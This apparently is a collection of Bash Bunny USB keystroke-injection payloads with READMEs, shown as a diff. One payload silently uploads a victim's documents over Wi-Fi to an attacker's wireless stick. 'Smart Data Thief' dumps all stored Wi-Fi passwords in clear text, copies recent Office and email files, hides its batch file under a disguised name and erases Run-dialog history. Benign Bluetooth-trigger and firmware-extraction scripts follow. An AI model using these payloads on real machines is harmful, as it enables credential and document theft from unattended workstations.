||||
<keyType>passPhrase</keyType>
|
||||
<protected>false</protected>
|
||||
<keyMaterial>${PSK}</keyMaterial>
|
||||
</sharedKey>
|
||||
</security>
|
||||
</MSM>
|
||||
<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profile/v3">
|
||||
<enableRandomization>false</enableRandomization>
|
||||
</MacRandomization>
|
||||
</WLANProfile>
|
||||
"@ | Out-File -FilePath "${profile_path}"
|
||||
|
||||
(NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null
|
||||
Remove-Item -Path "${profile_path}" -Force
|
||||
|
||||
# Checks whether the Wi-Fi interface is connected to the "SanDisk".
|
||||
# Whether the gateway can be reached.
|
||||
# If not, automatically starts again.
|
||||
#
|
||||
While ($TRUE) {
|
||||
$ConnectionError = $NULL
|
||||
Try {
|
||||
(NETSH WLAN CONNECT name="$SSID") | Out-Null
|
||||
$wifi_connected = (Get-NetConnectionProfile).Name
|
||||
$gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop)
|
||||
$gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet)
|
||||
If ($wifi_connected -eq $SSID -And $gateway_reachable) {
|
||||
Break
|
||||
}
|
||||
} Catch {
|
||||
$ConnectionError = $_
|
||||
Start-Sleep -Seconds 8
|
||||
}
|
||||
}
|
||||
|
||||
#
|
||||
# Exfiltration of the files via the HTTP channel.
|
||||
#
|
||||
|
||||
Function Invoke-CustomRequest($Url, $Method) {
|
||||
$RequestError = $NULL
|
||||
Try {
|
||||
$request = [System.Net.WebRequest]::Create($Url)
|
||||
$request.Method = $Method
|
||||
$request.GetResponse().Close()
|
||||
} Catch {
|
||||
$RequestError = $_
|
||||
return $FALSE
|
||||
}
|
||||
return $TRUE
|
||||
}
|
||||
|
||||
Function Invoke-UploadRequest($Url, $File) {
|
||||
$RestError = $NULL
|
||||
Try {
|
||||
$empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
|
||||
If (!$empty) {
|
||||
Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
|
||||
}
|
||||
} Catch {
|
||||
$RestError = $_
|
||||
}
|
||||
}
|
||||
|
||||
Function Exfiltration-Files($Directory, $Extension, $Url) {
|
||||
$files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
|
||||
ForEach ($file in $files) {
|
||||
$random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) )
|
||||
$basename = Split-Path -Path "${file}" -Leaf -Resolve
|
||||
Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
|
||||
}
|
||||
}
|
||||
|
||||
$sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
|
||||
|
||||
$check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
|
||||
If ($check_loot) {
|
||||
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
|
||||
} Else {
|
||||
Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
|
||||
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
|
||||
}
|
||||
|
||||
# Cleanup
|
||||
#
|
||||
(NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
|
||||
Exit
|
||||
|
||||
}
|
|
@ -0,0 +1,74 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SanDisk Wireless Stick Exfiltration
|
||||
#
|
||||
# Description: Files Exfiltration with "SanDisk Wireless Stick"
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Target: Microsoft Windows 10
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ===============
|
||||
# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
#
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
readonly SANDISK_SSID="HAK5-EXFIL"
|
||||
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
|
||||
readonly SANDISK_LOOT="loots"
|
||||
readonly USER_DIRECTORY="~\\"
|
||||
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 5000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
Q STRING "CD \"\${BB_VOLUME}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
@ -0,0 +1,109 @@
|
|||
# Title: Smart Data Thief
|
||||
# Description: Exfiltrates high value files from documents / desktop, gets all WiFi keys, shuts down after configurable
|
||||
# time, may be triggered to start and / or stop by BLE, offers optional distraction on shutdown
|
||||
# Author: saintcrossbow
|
||||
# Props: Hak5Darren
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Target: Windows 10 with minimum powershell usage
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# The perfect versatile data thief with multiple configurations to tailor attacks towards an engagement. Attack is timed
|
||||
# so you'll know exactly how much time you have with each target. See the configuraton section for modifications.
|
||||
#
|
||||
# Payload targets the following from the workstation:
|
||||
# - All WiFi creds
|
||||
# - The past 30 days in both Desktop and Documents
|
||||
# - All Word docs, Excel spreadsheets, loose email files (*.msg), text files, and OneNote notebooks
|
||||
#
|
||||
# * Note: All bluetooth monitoring based on Hak5Darren's methods already present on the Bash Bunny
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts and monitors the attack. All configuration contained in this file.
|
||||
# - verify.bat: Run the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't
|
||||
# verify anything – it is just called that because it is "in disguise"
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and verify.bat on either switch directory
|
||||
# - If you are using a SD card, copy verify.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bash Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
# LEDs
|
||||
# ----
|
||||
# Magenta: Initial setup – about 1 – 3 seconds
|
||||
# Slow 1 second yellow on and off: Waiting for start mission trigger by BLE
|
||||
# Single yellow blink: Attack in progress
|
||||
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
|
||||
|
||||
# Options
|
||||
# -------
|
||||
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
|
||||
BB_NAME="BashBunny"
|
||||
# Total time allocated for the attack, after which the Bash Bunny will shutdown
|
||||
EJECT_TIME=30
|
||||
# BLE ID to stop attack immediately and go to shutdown
|
||||
ABORT_MISSION="QSTOP"
|
||||
# Flash a bunch of windows and lock PC if ABORT mission received
|
||||
DISTRACT_ON_ABORT=false
|
||||
# Do we wait for a start trigger? And what is it?
|
||||
WAIT_FOR_TRIGGER=false
|
||||
START_MISSION="QSTART"
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
LED SETUP
|
||||
|
||||
# Start bluetooth for observation
|
||||
source bunny_helpers.sh
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
|
||||
# Wait for "button job" if desired
|
||||
if $WAIT_FOR_TRIGGER; then
|
||||
CUCUMBER ENABLE
|
||||
LED Y SLOW
|
||||
WAIT_FOR_PRESENT $START_MISSION
|
||||
fi
|
||||
|
||||
# Attack
|
||||
# ------
|
||||
CUCUMBER DISABLE
|
||||
ATTACKMODE HID STORAGE
|
||||
Q DELAY 1000
|
||||
LED ATTACK
|
||||
Q DELAY 100
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
|
||||
Q STRING cmd.exe /c start /min powershell ".((gwmi win32_volume -f 'label=''$BB_NAME''').Name+'payloads\\$SWITCH_POSITION\verify.bat')"
|
||||
Q ENTER
|
||||
|
||||
# Variation on the WAIT_FOR_PRESENT method so we can delay as well as observe BLE
|
||||
for (( c=1; c<=$EJECT_TIME; c++ ))
|
||||
do
|
||||
timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -ao $ABORT_MISSION /tmp/bt_observation; then
|
||||
if $DISTRACT_ON_ABORT; then
|
||||
for i in {1..5}
|
||||
do
|
||||
Q GUI d
|
||||
Q DELAY 200
|
||||
done
|
||||
Q GUI l
|
||||
fi
|
||||
break
|
||||
fi
|
||||
done
|
||||
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
shutdown now
|
||||
|
|
@ -0,0 +1,54 @@
|
|||
## Smart Data Thief
|
||||
|
||||
Make your Bash Bunny into the perfect data thief. This payload is ideal for demonstrating the need to lock workstations: using it, you can stroll through a facility and steal critical information from PC after PC. The attack is highly configurable with the following options:
|
||||
|
||||
- Copies are timed to be as fast or as long as you want. You’ll know
|
||||
exactly how long you have per workstation, and also know you can
|
||||
remove the Bash Bunny safely once it the time expires
|
||||
- The copy may be configured to stop when a secret BLE beacon is sent –
|
||||
the Bash Bunny will shut down for immediate removal.
|
||||
- Concerned that someone might see the attack? Configure the payload to
|
||||
flash windows and suddenly lock before shutting down the Bash Bunny,
|
||||
which gives the payload time to clean up its tracks while you make
|
||||
appropriate excuses.
|
||||
- Want to trigger the payload from afar? Make the attack a “button job”
|
||||
– the Bash Bunny will take advantage of Cool Cucumber CPU usage while
|
||||
waiting for the secret BLE beacon.
|
||||
|
||||
The payload may be used with or without a SD card and places loot in a folder with the computer’s name. Additionally it targets the most likely high-value targets on a workstation, and only those that have been updated in past 30 days – however feel free to tailor parameters to your unique pentest situation.
|
||||
|
||||
**Targets**
|
||||
|
||||
1. All WiFi creds used by the workstation
|
||||
2. The past 30 days in both Desktop and Documents for:
|
||||
- Word docs
|
||||
- Excel spreadsheets
|
||||
- Loose email files (*.msg)
|
||||
- Text files
|
||||
- OneNote notebooks
|
||||
|
||||
**Files Used**
|
||||
|
||||
- payload.txt: Starts and monitors the attack. All configuration constants are contained in this file.
|
||||
- verify.bat: Runs the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't verify anything – it is just called that because it is "in disguise"
|
||||
|
||||
**Setup**
|
||||
1. Place the payload.txt and verify.bat on either switch directory
|
||||
2. If you are using a SD card, copy verify.bat to /payloads/switch*n*/ (where *n* is the switch you are running)
|
||||
3. For maximum versatility, place verify.bat in both locations
|
||||
|
||||
**Payload Configuration**
|
||||
|
||||
Change any of the constants below to match your mission parameters:
|
||||
- BB_NAME: Make sure you have the right Bash Bunny name in this constant
|
||||
- EJECT_TIME: Total time allocated for the attack, after which the Bash Bunny will shutdown
|
||||
- ABORT_MISSION: Specify what BLE beacon will stop the attack - the payload will check every second for the beacon
|
||||
- DISTRACT_ON_ABORT: If the payload is stopped by the BLE beacon, it will also flash a bunch of windows and lock the PC before shutting down to cause a distraction.
|
||||
- WAIT_FOR_TRIGGER: Don’t start the attack immediately but wait for the BLE beacon.
|
||||
- START_MISSION: The BLE beacon that will remotely start the attack. Make sure WAIT_FOR_TRIGGER is set to true.
|
||||
|
||||
**LED meanings**
|
||||
- Magenta: Initial setup – about 1 – 3 seconds
|
||||
- Slow 1 second yellow on and off: Waiting for start mission trigger to be sent by BLE
|
||||
- Single yellow blink: Attack in progress
|
||||
- Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
|
|
@ -0,0 +1,14 @@
|
|||
@echo off
|
||||
cd /d %~dp0
|
||||
mkdir \loot\WiFiCreds\%COMPUTERNAME%
|
||||
cd \loot\WiFiCreds\%COMPUTERNAME%
|
||||
netsh wlan export profile key=clear
|
||||
timeout 1
|
||||
mkdir \loot\DriveLast30\%COMPUTERNAME%
|
||||
cd \loot\DriveLast30\%COMPUTERNAME%
|
||||
robocopy %userprofile%\Documents\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
|
||||
robocopy %userprofile%\Desktop\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
|
||||
|
||||
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
||||
timeout 1
|
||||
exit
|
|
@ -0,0 +1,22 @@
|
|||
# Title: Read It Out
|
||||
# Description: Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: HID
|
||||
# Extensions: Run
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID
|
||||
|
||||
QUACK DELAY 500
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powershell -Noni -NoP -W h -C \"& {\$s=New-Object -ComObject SAPI.SPVoice; gci([Environment]::GetFolderPath('MyDocuments')) -file *.txt | % {\$s.Speak(\$(gc(\$_.FullName)))}}\""
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,27 @@
|
|||
# Read It Out
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows 10 (Powershell 5.1+)
|
||||
- Category: Exfiltration
|
||||
- Attackmode: HID
|
||||
- Extensions: Run
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Super subtle exfiltration method.
|
||||
|
||||
Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
|
||||
|
||||
## Config
|
||||
Add -r to do subdirectorys
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| ------ | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
|
@ -0,0 +1,23 @@
|
|||
# BlueTooth2
|
||||
|
||||
BlueTooth2 is a program that scans for two bluetooth devices and depending on what one it finds it runs whatever.
|
||||
|
||||
## What it Does and How its Different
|
||||
|
||||
Unlike the standard WAIT_FOR_PRESENT that scans for one device and doesnt allow code after it to run until found.
|
||||
This will do a scan and then check for two different devices names allowing for multiple remote triggers that
|
||||
can do different things.
|
||||
|
||||
## Note
|
||||
|
||||
I imagine your looking at this code and wondering what idiot wrote it and I would very cool if you would
|
||||
make it more efficient or even pretty. It worked when I tested it (I use BLE Tool)
|
||||
|
||||
## LED
|
||||
|
||||
| COLOR | DESCRIPTION |
|
||||
|---------|-------------|
|
||||
| White | Scan |
|
||||
| Yellow | Checking |
|
||||
| Green | Attack1 |
|
||||
| Blue | Attack2 |
|
|
@ -0,0 +1,76 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: BlueTooth2
|
||||
# Description: multiple remote triggers
|
||||
# Author: JustaProgrammer9
|
||||
# Category: General
|
||||
# Target: Windows
|
||||
# Attackmodes: HID
|
||||
# Suggestion: Use BLE Tool if triggers take to long
|
||||
#
|
||||
|
||||
#--// Function \\--#
|
||||
WAIT_FOR_BLUETOOTH() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
}
|
||||
#------------------#
|
||||
|
||||
|
||||
#--// Setup/Config \\--#
|
||||
ATTACKMODE HID
|
||||
|
||||
device="notepad"
|
||||
|
||||
otherdevice="attack"
|
||||
#----------------------#
|
||||
|
||||
|
||||
#--// Check for devices \\--#
|
||||
while true; do
|
||||
LED W
|
||||
WAIT_FOR_BLUETOOTH
|
||||
LED Y
|
||||
|
||||
if grep -qao $device /tmp/bt_observation; then
|
||||
if1="true"
|
||||
break
|
||||
|
||||
sleep 1
|
||||
|
||||
elif grep -qao $otherdevice /tmp/bt_observation; then
|
||||
if2="true"
|
||||
break
|
||||
|
||||
sleep 1
|
||||
|
||||
#add more if's for more bluetooth devices to look for
|
||||
|
||||
fi
|
||||
done
|
||||
#---------------------------#
|
||||
|
||||
|
||||
#--// Your attacks \\--#
|
||||
if [ $if1 = "true" ]; then
|
||||
LED G
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING "notepad"
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING "Hak5 rules"
|
||||
Q ENTER
|
||||
|
||||
elif [ $if2 = "true" ]; then
|
||||
LED B
|
||||
# do something cool here
|
||||
|
||||
else
|
||||
LED R
|
||||
|
||||
fi
|
|
@ -0,0 +1,92 @@
|
|||
#!/bin/python2
|
||||
from __future__ import absolute_import
|
||||
import sys
|
||||
import datetime
|
||||
import base64
|
||||
import binascii
|
||||
import struct
|
||||
import time
|
||||
from io import open
|
||||
try:
|
||||
try:
|
||||
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"x")
|
||||
except FileExistsError:
|
||||
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
|
||||
except NameError:
|
||||
try:
|
||||
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"a")
|
||||
except OSError:
|
||||
LogFile = open(u"./UIBEX_ExtractionLog.txt", u"w")
|
||||
|
||||
|
||||
if len(sys.argv) != 2:
|
||||
sys.stdout.write(u"Usage: {a} <Ubootimage/Block device containing image>\n".format(a=sys.argv[0]))
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
LogFile.write(u"[{a}]: Opening file {b} for reading...\n".format(a=datetime.datetime.utcnow(),b=sys.argv[1]))
|
||||
try:
|
||||
InFileHan = open(sys.argv[1],u"rb")
|
||||
except OSError as E:
|
||||
LogFile.write(u"[{a}]: Error. {E}\n".format(a=datetime.datetime.utcnow(),E=str(E)))
|
||||
sys.exit(1)
|
||||
LogFile.write(u"[{a}]: File open. Loading header....\n".format(a=datetime.datetime.utcnow()))
|
||||
InHeader = InFileHan.read(64)
|
||||
LogFile.write(u"[{a}]: Header loaded. Checking Magic.\n".format(a=datetime.datetime.utcnow()))
|
||||
try:
|
||||
assert InHeader[0:4:] == "'\x05\x19V"
|
||||
except AssertionError:
|
||||
LogFile.write(u"[{a}]: Assertion failed, magic is not correct.\n".format(a=datetime.datetime.utcnow()))
|
||||
sys.exit(1)
|
||||
LogFile.write(u"[{a}]: Magic verified.\n".format(a=datetime.datetime.utcnow()))
|
||||
InHedC = InHeader + "1"
|
||||
InHedC = InHedC[0:64:]
|
||||
# Blanking CRC.
|
||||
InHedC = InHedC[0:4:] + "\x00\x00\x00\x00" + InHedC[8::]
|
||||
# Verify CRC.
|
||||
HeaderCRC = struct.pack(">i",binascii.crc32(InHedC))
|
||||
try:
|
||||
assert HeaderCRC == InHeader[4:8:]
|
||||
except AssertionError:
|
||||
LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC),c=base64.b16encode(InHeader[4:8:])))
|
||||
sys.exit(1)
|
||||
LogFile.write(u"[{a}]: Header CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(HeaderCRC)))
|
||||
LogFile.write(u"[{a}]: Searching for uImage data.\n".format(a=datetime.datetime.utcnow()))
|
||||
# Grab length and verify data.
|
||||
ImageLength = struct.unpack(">i",InHeader[12:16])[0]
|
||||
ImageData = InFileHan.read(ImageLength)
|
||||
LogFile.write(u"[{a}]: uImage data loaded.\n".format(a=datetime.datetime.utcnow()))
|
||||
# Verify CRC.
|
||||
DataCRC = struct.pack(">i",binascii.crc32(ImageData))
|
||||
try:
|
||||
assert DataCRC == InHeader[24:28:]
|
||||
except AssertionError:
|
||||
LogFile.write(u"[{a}]: Assertion failed, CRC fail to verify. Calculated CRC: {b} Stored CRC: {c}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC),c=base64.b16encode(InHeader[24:28:])))
|
||||
sys.exit(1)
|
||||
LogFile.write(u"[{a}]: Data CRC: {b}\n".format(a=datetime.datetime.utcnow(),b=base64.b16encode(DataCRC)))
|
||||
LogFile.write(u"[{a}]: Both CRC's have been verified. Extraction complete.\n".format(a=datetime.datetime.utcnow()))
|
||||
LogFile.write(u"[{a}]: Here is header information:\n".format(a=datetime.datetime.utcnow()))
|
||||
HeaderDataT = [
|
||||
(u"Image Header Magic Number",base64.b16encode(InHeader[0:4]).decode()),
|
||||
(u"Image Header CRC Checksum",base64.b16encode(InHeader[4:8]).decode()),
|
||||
(u"Image Creation Timestamp",base64.b16encode(InHeader[8:12]).decode()),
|
||||
(u"Image Data Size",base64.b16encode(InHeader[12:16]).decode()),
|
||||
(u"Data Load Address",base64.b16encode(InHeader[16:20]).decode()),
|
||||
(u"Entry Point Address",base64.b16encode(InHeader[20:24]).decode()),
|
||||
(u"Image Data CRC Checksum",base64.b16encode(InHeader[24:28]).decode()),
|
||||
(u"Operating System",ord(InHeader[28])),
|
||||
(u"CPU architecture",ord(InHeader[29])),
|
||||
(u"Image Type",ord(InHeader[30])),
|
||||
(u"Compression Type",ord(InHeader[31])),
|
||||
(u"Image Name",InHeader[32::].split("\x00")[0].decode())
|
||||
]
|
||||
for x in HeaderDataT:
|
||||
LogFile.write(u"{x0}: {x1}\n".format(x0=x[0],x1=x[1]))
|
||||
OutFileName = "./uImage-{a}.img".format(a=int(time.time()//1))
|
||||
LogFile.write(u"[{a}]: Writing image to {OutFileName}\n".format(a=datetime.datetime.utcnow(),OutFileName=OutFileName))
|
||||
OutFileHan = open(OutFileName,u"wb")
|
||||
OutBytes = OutFileHan.write(InHeader + ImageData)
|
||||
LogFile.write(u"[{a}]: Written {OutBytes} bytes.\n".format(a=datetime.datetime.utcnow(),OutBytes=OutBytes))
|
||||
LogFile.write(u"[{a}]: -------------------------------------------------------\n".format(a=datetime.datetime.utcnow()))
|
||||
LogFile.close()
|
||||
sys.exit(0)
|
|
@ -0,0 +1,156 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: FICBunny
|
||||
# Description: Firmware Image Creator for the Bash Bunny
|
||||
# Author: HSF3232
|
||||
# Version: 1.0
|
||||
# Last tested Bunny Firmware version: 1.7
|
||||
#
|
||||
# LED STATUS
|
||||
# Slow blinking Red - Failed to get the script. Please check that "UIBEX.py" exists within the payload directory.
|
||||
# Solid Magenta - Setup in progress...
|
||||
# Single blinking Yellow - STAGE 1
|
||||
# Double blinking Yellow - STAGE 2
|
||||
# Triple blinking Yellow - STAGE 3
|
||||
# Quadruple blinking Yellow - STAGE 4
|
||||
# Solid Red (After STAGE 4) - Firmware image is missing. If WriteToRecovery is on, will copy the missing firmware image to recovery.
|
||||
# Quadruple blinking Cyan (After STAGE 4) - Firmware image exists. If Overwrite and WriteToRecovery are on, will replace the firmware image.
|
||||
# Very fast Blinking Magenta - I am writing to the recovery partition, DO NOT UNPLUG!
|
||||
|
||||
|
||||
########
|
||||
# VARS #
|
||||
########
|
||||
# WriteToRecovery - When firmware image extraction is complete, write the firmware image to recovery?
|
||||
WriteToRecovery=1
|
||||
|
||||
# Overwrite - If an existing firmware file is detected within recovery, overwrite it?
|
||||
Overwrite=0
|
||||
|
||||
#################################
|
||||
# DO NOT TOUCH BELOW THIS LINE! #
|
||||
#################################
|
||||
|
||||
GET SWITCH_POSITION
|
||||
###############
|
||||
# SETUP Stage.#
|
||||
###############
|
||||
# Setup stage will force turn off ATTACKMODE to allow access to storage, then we will copy the required script and make the necessary directories.
|
||||
ATTACKMODE OFF # Enforce no access to storage. Once execution is complete, we will turn ATTACKMODE to SERIAL STORAGE.
|
||||
LED SETUP
|
||||
mount /dev/nandf /root/udisk # Ensure udisk is avalible to copy our UIBEX script.
|
||||
switchPOS=$SWITCH_POSITION
|
||||
if [ ! -e /root/udisk/payloads/$switchPOS/UIBEX.py ]; then # Needed uImage extraction script wasn't found...
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
mkdir /tmp/rootexfs # Temporary directory for holding blank system folders and the UIBEX.py script.
|
||||
mkdir /tmp/massdisk # /dev/nandf OR /dev/mmcblk0p1. We will copy our completed firmware image here for later keeping.
|
||||
# Since we're executing this script from /tmp, we can unmount udisk once we're ready.
|
||||
mkdir /tmp/recdisk # /dev/nandg. We will be copying our completed firmware image here once done to re-enable recovery.
|
||||
mkdir /tmp/cachedisk # /dev/nandh. We will need this to store our large temporary files.
|
||||
cp /root/udisk/payloads/$switchPOS/UIBEX.py /tmp/rootexfs # Copy the required script.
|
||||
sleep 1 # Safety net, copying the file over.
|
||||
umount /root/udisk # We're finished here.
|
||||
cd /tmp/rootexfs # Using CD to change our working directory to rootexfs so we can execute UIBEX.py.
|
||||
mkdir media mnt proc sys tmp # Make blank directories - We will use this later for creating rootfs.tar
|
||||
chmod 555 proc sys # dr-xr-xr-x
|
||||
chmod 777 tmp # drwxrwxrwx
|
||||
# Mounting required partitions.
|
||||
if [ -b /dev/mmcblk0p1 ]; then # If we have the SD card available to us, mount it.
|
||||
mount /dev/mmcblk0p1 /tmp/massdisk
|
||||
else
|
||||
mount /dev/nandf /tmp/massdisk
|
||||
fi
|
||||
mount /dev/nandg /tmp/recdisk # Make recovery disk mount point.
|
||||
mount /dev/nandh /tmp/cachedisk # Make cache disk mount point.
|
||||
mkdir /tmp/cachedisk/upgrade # Make upgrade directory - we will place rootfs and uImage in here.
|
||||
mkdir -p /tmp/massdisk/loot/recscript # Make storage location for output of all script related content.
|
||||
|
||||
###########
|
||||
# STAGE 1 #
|
||||
###########
|
||||
# Extract the uImage file.
|
||||
LED STAGE1
|
||||
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
|
||||
python2 UIBEX.py /dev/nandc # Execute uImage extraction script.
|
||||
mv uImage*.img /tmp/cachedisk/upgrade/uImage # move uImage to the upgrade folder
|
||||
md5sum /tmp/cachedisk/upgrade/uImage > /tmp/cachedisk/upgrade/uImage.md5 # Calculate MD5, save to upgrade folder.
|
||||
mv UIBEX_ExtractionLog.txt /tmp/massdisk/loot/recscript/ # Move the extraction log to output folder.
|
||||
# UIBEX complete.
|
||||
|
||||
###########
|
||||
# STAGE 2 #
|
||||
###########
|
||||
# Copy all system directories into rootfs.tar
|
||||
LED STAGE2
|
||||
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for the user interface.
|
||||
tar --transform 's,^,/rootfs/,S' -cvf /tmp/cachedisk/upgrade/cherry.rootfs.tar media/ mnt/ proc/ sys/ tmp/ /boot/ /home/ /opt/ /srv/ /dev/pts /dev/shm/ /dev/fd/ /dev/ptmx /dev/stderr /dev/stdin /dev/stdout /dev/full /dev/null /dev/random /dev/urandom /dev/zero /dev/tty /root/ /run/ /etc/ /sbin/ /bin/ /lib/ /var/ /usr/ &> /tmp/massdisk/loot/recscript/RootFS_EX_errors.txt > /tmp/massdisk/loot/recscript/RootFS_EX_output.txt
|
||||
# Tar all filesystem resources to rootfs.tar in upgrade folder
|
||||
md5sum /tmp/cachedisk/upgrade/cherry.rootfs.tar > /tmp/cachedisk/upgrade/cherry.rootfs.tar.md5 # Calculate MD5, save to upgrade folder.
|
||||
# TAR image extraction is complete.
|
||||
|
||||
###########
|
||||
# STAGE 3 #
|
||||
###########
|
||||
# Compile firmware file.
|
||||
LED STAGE3
|
||||
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
|
||||
# Now complie the tar.gz to /tmp/massdisk/
|
||||
cd /tmp/cachedisk/ # Need to move to cache disk, otherwise files would be located at /tmp/cachedisk/upgrade, not what we want!
|
||||
